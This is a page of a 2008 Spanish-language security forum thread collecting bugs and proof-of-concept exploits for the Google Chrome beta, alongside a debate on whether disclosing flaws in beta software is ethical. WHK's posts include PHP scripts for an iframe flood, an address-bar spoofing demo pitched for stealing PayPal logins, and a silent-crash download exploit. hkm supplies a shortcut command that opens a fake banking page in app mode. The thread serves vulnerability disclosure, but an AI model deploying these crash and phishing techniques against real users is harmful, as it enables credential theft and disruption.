elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
0 Usuarios y 4 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32  (Leído 54,020 veces)
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #10 en: 3 Septiembre 2008, 22:04 pm »

La 'Etica' dice que no se sacan advisories ni poc de programas beta.
En línea

[/url]
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #11 en: 3 Septiembre 2008, 23:13 pm »

Y mi ética dice que mientras mas fallas puedas reportar es mejor para el desarrollador ya que esto ayuda a fortalecer el mismo software asi como se ha hecho con firefox desde un comienzo.

Lo mejor que pudieron haber hecho es liberar su código , no tan solo para desarrollar sino para sanar bugs que podrían comprometer la integridad de todos sus usuarios finales por mas que sea beta o no.
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #12 en: 4 Septiembre 2008, 00:35 am »

Lo mas entretenido es que en el soporte de google nadie habla ingles XD
http://code.google.com/p/chromium/issues/detail?id=213

me dicen: "los técnicos solo hablan inglés" y nadie sabe que hablo  :xD entonces supongo que el software fue hecho solamente para los de habla inglesa joder!

hay que explicarles con dibujos y manzanas...


Bueno, sin ir mas ayá solo me molesta que no hablen español pero en cuanto al explorador en si espero que quede bién muy pronto como para salir de la etapa beta y poder utilizarlo con toda normalidad.

Código
  1. <?php
  2. echo "Iniciando prueba del concepto por WHK probando una
  3.          inundaci&oacute;n de mensajes en la bandeja de avisos sin la
  4.          posibilidad de eliminar completamente la barra perdiendo
  5.          links y aumentando el uso de recursos desmedidos.<br>\n";
  6. for($Cuenta=0;$Cuenta<900;$Cuenta++){
  7.  echo '<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" width="0" height="0" frameborder="0"></iframe>'."\n";
  8. }
  9. ?>

Además tiene la misma falla que firefox cuando modificas la barra del explorador y cuando haces click en el espacio de trabajo sin dar enter no buelve a su estado original... por ejemplo entra a https://evil.domain/getdata.php y después ve a tu web preparada para alojar los datos de la victima https://www.paypal.com/ sin dar enter y haciendo click en cualquier parte del formulario, si dejas el explorador en ese estado cualquier persona que intente acceder a su cuenta la estará regalando (IE7 no es vulnerable pero si ayer encontré una falla donde ingresas carácteres nulos en javascript: y la url se mantiene intacta de igual forma).
« Última modificación: 4 Septiembre 2008, 01:51 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #13 en: 4 Septiembre 2008, 08:11 am »

Código
  1. vbscript:alert("XSS");
El explorador no interpreta visual basic scripts.

Código
  1. mms://web.com/radio/
No soporta videos online con windows media video

Código
  1. <?php
  2. echo "Prueba del concepto para probar la vulnerabilidad de Google Chrome
  3. al no reestablecer su barra de navegaci&oacute;n al ser modificada sin ser
  4. establecido como url final.<br>
  5. \$_SERVER[HTTP_HOST] = <b>$_SERVER[HTTP_HOST]</b>"
  6. ?>
http://www.jccharry.com/pruebas/Google%20Chrome/1.php

Lo visualizas y después escribes arriba "https://www.paypal.com" y son presionar enter posicionas el mouse sobre el navegador.
Un atacante podría utilizarlo para robar cuentas remotamente, inclusive desde un ciber... dejas la página inicial de msn con un fake que capture contraseñas.



Esta falla podría ser aprobechado para un phishing facilmente.

Nota: Internet Explorer no presenta ese bug.


Citar
chrome-resource://new-tab/%%
En esta URL el explorador queda cargando infinitamente.

Citar
chrome-resource://thumb/fake
Acá el contenido no es declarado como imagen (Falta la cabezera del header!)



Como se imprime en texto plano, que pasaría si una imagen contiene cntenido HTML?, talves ahora no se sepa como pero con "chrome-resource" talves pueda apuntar a un archivo descargado automáticamente en formato imagen y cargarlo de la misma forma para su ejecución.
PD: Google le hace publicidad a "Adobe ImageReady"  :o


Claro...


Ovbiamente es rápido porque trabaja con multiprocesos pero eso significa utilizar casi la mitad de tus recursos queriendo decir "o navegas o usas photoshop porque acá no podrás caminar y masticar chicle al mismo tiempo"


Citar
chrome-resource://inspector
Ejalee!!!!
Citar
Esta página web tiene un bucle de redireccionamiento.

La página web de chrome-resource://inspector////////////////////// ha provocado demasiados redireccionamientos. Es posible que se solucione el problema si borras las cookies. Si no es así, tal vez se deba a una configuración del servidor y no a un problema con tu equipo.

A continuación se detallan algunas sugerencias:
Carga esta página web de nuevo más tarde.
  Más información sobre este error
Como decia antes, talves puedas tener acceso a la carga de archivos externos al sistema.


No se si alguien me está tirando alguna maldición  :¬¬ pero el explorer no me deja visualizar lo que hay dentro de
Citar
C:\Documents and Settings\Yan\Configuración local\Datos de programa\Google\Chrome\Application\0.2.149.27\Resources\Inspector\Images

« Última modificación: 4 Septiembre 2008, 08:43 am por WHK » En línea

hkm

Desconectado Desconectado

Mensajes: 36


http://www.hakim.ws


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #14 en: 4 Septiembre 2008, 08:41 am »

La funcion de acceso directo a aplicaciones aparte de no mostrar en que servidor estas, tampoco muestra el estado del SSL. Esta es una invitacion a portales falsos.

Un atacante (phisher) podria abusar de usuarios novatos que por ingenieria social abran un archivo malicioso (.bat o .lnk) que contenga una linea similar a:
Código:
%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicioso.net/pagina-bancaria-falsa.html


hkm
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #15 en: 4 Septiembre 2008, 16:14 pm »

La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Al contrario, se sacan para que los arreglen antes de que sea una versión estable :¬¬.. lo que sí es "mas" ético es no publicar las cosas hasta que las arreglen, pero no siempre se puede.

WHK, me hubieras dicho y te ayudaba con la traducción :xD.

Saludos!!

PD. Un gusto verlo por aqui hakim
En línea

APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #16 en: 4 Septiembre 2008, 18:49 pm »

Ey! probablemente estes en la pista de un zero day... XD
Este google chrome esta demasiado beta como para que lo use nadie...
Un abrazo
APOKLIPTICO
En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #17 en: 4 Septiembre 2008, 23:12 pm »

Citar
Este google chrome esta demasiado beta como para que lo use nadie...
Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #18 en: 5 Septiembre 2008, 00:58 am »

encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

 :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código
  1. <?php
  2.  
  3. /*
  4. Google Chrome 0.2.149.27 (1583) Silent Crash PoC
  5. WHK - elhacker.net
  6. */
  7.  
  8. $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
  9. $contenido = 'prueba';
  10. header("Content-Type: application/octet-stream");
  11. header("Content-Disposition: attachment; filename=$nombre");
  12. print($contenido);
  13.  
  14. /*
  15. http://www.jccharry.com/pruebas/Google%20Chrome/2.php
  16. http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
  17. http://milw0rm.com/exploits/6365
  18. */
  19.  
  20. ?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*
« Última modificación: 5 Septiembre 2008, 06:43 am por WHK » En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #19 en: 5 Septiembre 2008, 03:00 am »


@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.

En línea

Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
2 Google Bugs XSS&Redirect with using bit.ly (video)
Nivel Web
sony1a2 8 5,958 Último mensaje 4 Enero 2011, 22:26 pm
por berz3k
Bugs hunter de Google
Hacking
Panic0 0 2,210 Último mensaje 21 Octubre 2021, 18:48 pm
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines